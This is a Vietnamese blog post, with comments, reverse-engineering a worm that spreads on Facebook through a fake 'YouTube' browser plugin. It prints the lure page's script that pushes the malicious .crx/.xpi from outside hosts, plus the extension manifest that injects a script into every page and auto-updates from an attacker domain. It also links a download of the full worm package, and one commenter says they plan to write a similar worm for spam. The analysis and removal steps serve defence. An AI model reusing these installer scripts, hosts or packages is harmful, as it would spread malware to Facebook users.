Con worm này xuất phát từ một trang fake FB ở địa chỉ http://fbviralvideos.blogspot.com/
Tại trang này chả có gì cả ngoài việc nó làm giả y chang một cái trang FB của một em hót girl nào đó bên trời tây, kèm một cái link "Cài đặt plugin" để coi em ấy show hàng. Khi click vào cái nút "Install Plugin" đó nó sẽ kích hoạt một hàm tên
<a onclick="instalar();" class="install nomargin"></a>Cái hàm này sẽ thực hiện thăm dò xem trình duyệt nạn nhân đang dùng là Firefox hay Chrome để đưa ra cái link cài Plugin giả mạo
<script>
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
function instalar(){
if (is_chrome){
window.open("http://yourvidsviral.com/youtube.crx");
} else if(is_firefox){
var params = {
"Youtube Extension": {
URL: "http://yourvidsviral.com/youtube.xpi",
toString: function () { return this.URL; }
}
};
InstallTrigger.install(params);
} else{
window.open("");
}
}
</script>
Cái link cài plugin xạo xạo này chính là con worm. Cái hay ở đây là con worm này không làm bằng binary mà viết bằng javascript và được đóng gói thành plugin của Chrome ( dạng crx ) và plugin của Firefox ( dạng xpi ).
Sau khi cài plugin vào thì nó sẽ kích hoạt phần chính của con worm, đây là phần chịu trách nhiệm lây lan tiếp tới các người dùng FB khác. Script này được load về từ link http://yourvidsviral.com/script.js
Kèm theo đó, trong con worm này còn được tích hợp cơ chế cập nhật thông qua tính năng cập nhật plugin tự động của Firefox hay Chrome
{
"content_scripts": [ {
"all_frames": true,
"matches": [ "http://*/*"],
"js": [ "go.js" ]
} ],
"description": "Plays Youtube Videos Online, Quickly \u0026 Efficiently",
"icons": {
"128": "icon128.png",
"16": "icon16.png",
"48": "icon48.png"
},
"name": "YouTube Extension",
"permissions": [ "*://*/*" ],
"update_url": "http://allinfree.net/chrome.xml", "version": "1.0.3"
}
Đã RE xong, bạn có thể tải về toàn bộ gói dữ liệu của con worm đã được RE tại đây để nghiên cứu
http://www.mediafire.com/?6vxm6a77t4x66t1
-----------------------------
Cách gỡ bỏ con Worm
Chrome: mở tab mới, vào phần Apps, kiếm cái plugin Youtube, nhấp phải chọn remove from Chrome . Xong
Firefox: vào Menu Tool -> add-on -> extensions -> chọn cái plugin Youtube rồi chọn Remove . Xong
------------------------------
RE toàn bộ con worm trong 15 phút, phá kỷ lục trước giờ của mền :D
Hay quá anh ơi...
ReplyDeleteTuyệt ^^
ReplyDeleteThank Sieu nhan !
ReplyDeleteCảm ơn TIÊN SINH. TẠI HẠ vừa nhận được link này, thấy nghi quá, Được Bác GOOGLE dẫn đường chỉ lối tới gặp được CAO NHÂN. tại hạ rất lấy làm vinh hạn. Đa tạ đa tạ !
ReplyDeleteHard working. Good job
ReplyDeletehì hì cám ơn anh PhuongDong nhiều :)
ReplyDeletehihi, em đang ngâm cứu viết 1 con như này. đi spam facebook :))
ReplyDelete